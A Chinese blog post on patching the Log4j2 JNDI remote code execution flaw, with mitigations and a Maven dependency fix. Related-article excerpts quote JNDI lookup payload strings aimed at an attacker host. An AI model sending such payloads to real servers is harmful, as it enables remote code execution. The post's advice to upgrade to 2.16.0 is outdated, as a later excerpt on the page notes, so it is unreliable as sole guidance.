Apache Log4j 远程代码执行漏洞修复

最新推荐文章于 2024-06-03 15:52:37 发布
最新推荐文章于 2024-06-03 15:52:37 发布
阅读量2.2k 收藏
点赞数
分类专栏: 网络信息安全 文章标签: apache 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44161038/article/details/121969922
版权

Apache Log4j是一个基于Java的日志记录组件。Apache Log4j2是Log4j的升级版本,通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。

Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。

CNVD对该漏洞的综合评级为“高危”。

国家信息安全漏洞共享平台:https://www.cnvd.org.cn/webinfo/show/7146

修复方案:

1 官方补丁

目前,Apache官方已发布新版本完成漏洞修复,请及时升级至最新版本2.16.0:https://logging.apache.org/log4j/2.x/download.html。

2 临时修复措施(任选其一)

(1)添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true;

(2)在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;

(3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

(4)限制受影响应用对外访问互联网;

(5)禁用JNDI。如在spring.properties里添加spring.jndi.ignore=true;

(6)部署使用第三方防火墙产品进行安全防护,并更新WAF、RASP规则等。

3 受影响组件

Apache Solr 、Apache Struts2、Apache Flink 、Apache Druid 、spring-boot-strater-log4j2

spring-boot-starter-log4j2 修复方案:

        <!--log4j 远程控制漏洞升级 2.16.0-->
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-log4j2</artifactId>
			<version>${org.springframework.boot.version}</version>
			<exclusions>
				<exclusion>
					<groupId>org.apache.logging.log4j</groupId>
					<artifactId>log4j-api</artifactId>
				</exclusion>
				<exclusion>
					<groupId>org.apache.logging.log4j</groupId>
					<artifactId>log4j-core</artifactId>
				</exclusion>
				<exclusion>
					<groupId>org.apache.logging.log4j</groupId>
					<artifactId>log4j-slf4j-impl</artifactId>
				</exclusion>
			</exclusions>
		</dependency>
		<dependency>
			<groupId>org.apache.logging.log4j</groupId>
			<artifactId>log4j-api</artifactId>
			<version>2.16.0</version>
		</dependency>
		<dependency>
			<groupId>org.apache.logging.log4j</groupId>
			<artifactId>log4j-core</artifactId>
			<version>2.16.0</version>
		</dependency>
		<dependency>
			<groupId>org.apache.logging.log4j</groupId>
			<artifactId>log4j-slf4j-impl</artifactId>
			<version>2.16.0</version>
		</dependency>

Zero. J
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache log4j远程代码执行漏洞复现
qq_46162550的博客
05-11 1728
Apache log4j远程代码执行漏洞复现(1) 漏洞原理:(2) 漏洞复现环境:(3) 漏洞复现过程: (1) 漏洞原理: Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,lookup会将jndi注入可执行语句执行,程序会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行,从而达成漏
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
Apache Log4j2 远程代码执行漏洞修复步骤
飞一站的博客
12-10 2939
目录 Apache Log4j2 远程代码执行漏洞修复步骤 漏洞说明 修复步骤 1、下载源码zip包到本地 2、解压到本地 3、用IDEA打开项目 4、执行Maven Deploy,将log4j2修复的版本包安装到Nexus 5、修改项目中的pom.xml 6、测试验证 Apache Log4j2 远程代码执行漏洞修复步骤 漏洞说明 参考链接:Apache Log4j2 远程代码执行漏洞分析 - 安全客,安全资讯平台 Apache Log4j2是一个基于Java的日志记录工具。由于
log4j2 远程执行代码漏洞修复-Log4j2
抽象的螺旋
12-13 1861
概述 此次 Apache Log4j2 漏洞触发条件为只要外部用户输入的数据会被日志记录,即可造成不安全远程代码执行修复参考 bug大概的执行逻辑: 黑客在自己的客户端启动一个带有恶意代码的rmi服务,通过服务端的log4j漏洞,向服务端的jndi context lookup的时候连接自己的rmi服务器,服务端连接rmi服务器执行lookup的时候会通过rmi查询到该地址指向的引用并且本地实例化这个类,所以在类中的构造方法或者静态代码块中写入逻辑,就会在服务端(jndi rmi过程中的客户端)实例
Web网络安全-----Log4j高危漏洞原理及修复_log4j漏洞是什么
最新发布
weixin_42340783的博客
06-03 1054
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码
严重危险级别!Apache存在Log4j远程代码执行漏洞
程序员小乐
12-19 229
????推荐大家关注一个公众号????点击上方 "编程技术圈"关注,星标或置顶一起成长后台回复“大礼包”有惊喜礼包!每日英文When your heart is getting exhausted ...
Apache Log4j2 远程代码执行漏洞修复
沛哥儿的专栏
12-27 250
近日国家信息安全漏洞共享平台(CNVD)收录了Apache Log4j2远程代码执行漏洞,通用漏洞编号CNVD-2021-95914。 Apache Log4j2是一款Java日志框架,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置。漏洞等级为:高危。 目前受影响范围如下: Apache Log4j 2.x < 2.15.0-rc2 建议使用相关组件的开发者进行自查,发现存在该漏洞后及时按照以下方案进行处置:...
吃瓜之高危Apache Log4j 远程代码执行漏洞分析
legendaryhaha的博客
12-11 2889
吃瓜之高危Apache Log4j 远程代码执行漏洞分析前言一、漏洞分析 前言 就在昨天,运维转发一条关于Apache Log4j 远程代码执行漏洞的公告,抱着吃瓜的心态,模拟复现了一波。 一、漏洞分析 根据报告内容,此次针对的是Apache Log4j 2.x < 2.15.0-rc2版本。 ...
Apache Log4j2远程代码执行漏洞(CVE-2021-44228)
Arlo的博客
12-30 1566
发布日期:2021-12-12 名称:Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228) 级别:严重 描述信息:Apache Log4j2是一个基于Java的日志记录工具,是Log4j的升级,在其前身Log4j 1.x基础上提供了Logback中可用的很多优化,同时修复了Logback架构中的一些问题,是目前最优秀的Java日志框架之一。该日志框架被大量用于业务系统开发,用来记录日志信息。开发者可能会将用户输入造成的错误信息写
Apache Log4j 远程代码执行漏洞直接让安全圈过年~
LiBai'S BLOG
12-10 2674
Apache Log4j 远程代码执行漏洞修复方案
Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31
星之空
12-31 752
还是稍微记录一下这个害得大家加班的大bug。 发生版本 Log4j versions 2.0 through 2.14.1。 (更新到2.15也不行。) 解决方案 升级到2.17.0 2.16还是有bug。 https://logging.apache.org/log4j/2.x/ 如果不能升级 加JVM参数:-Dlog4j2.formatMsgNoLookups=true 如果没有用,直接删掉:zip -q -d log4j-core-*.jar org/apache/logging/log4j/cor
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
Log4J2远程代码执行漏洞修复20211210.rar
12-13
Log4J2远程代码执行漏洞修复详解》 在IT安全领域,Log4J2的远程代码执行漏洞(CVE-2021-44228)引起了广泛关注。此漏洞影响了全球无数使用Java日志框架Log4J2的应用程序,其严重性在于它允许攻击者通过注入特定的...
log4j远程执行漏洞,测试源码
12-22
3. **多种协议支持**:除了LDAP和RMI,Log4j还支持其他协议,如JMS、JDBC等,这意味着攻击者有更多方式来触发远程代码执行。 **应对措施与修复** 为防范Log4j漏洞,开发者和管理员可以采取以下措施: 1. **升级到...
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中...
Apache_Log4j2_RCE漏洞复现(CVE-2021-44228)
qq_45751902的博客
10-05 822
这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。是最受欢迎的于开发时的日志组件。不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞
spring-boot-starter-log4j2漏洞修复方式
dhj8933的博客
12-14 4091
spring-boot-starter-log4j2漏洞修复方式
Apache log4j2 远程命令执行漏洞复现及修复方案
杨小熊学习笔记
12-14 6415
1. 漏洞信息 漏洞软件: Apache Log4j2 漏洞编号:CVE-2021-44228 漏洞描述:Apache Log4j2 远程命令执行 时间:2021-11-26 漏洞详情:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 漏洞影响范围版本:2.0.beta9 to 2.14.1 2. 排查指导 查看引用了 log4j-api 和 log4j-core 两个jar包,如maven依赖: <depend
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2676
Apache log4jApache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
处理,Apache Log4j 远程代码执行漏洞 工作
03-07
你好,关于处理 Apache Log4j 远程代码执行漏洞的工作,我们建议及时升级 Log4j 版本,或者禁用 Log4j,以保障系统安全。同时,也需要加强对系统漏洞的监测和防范,及时修复漏洞,确保系统安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值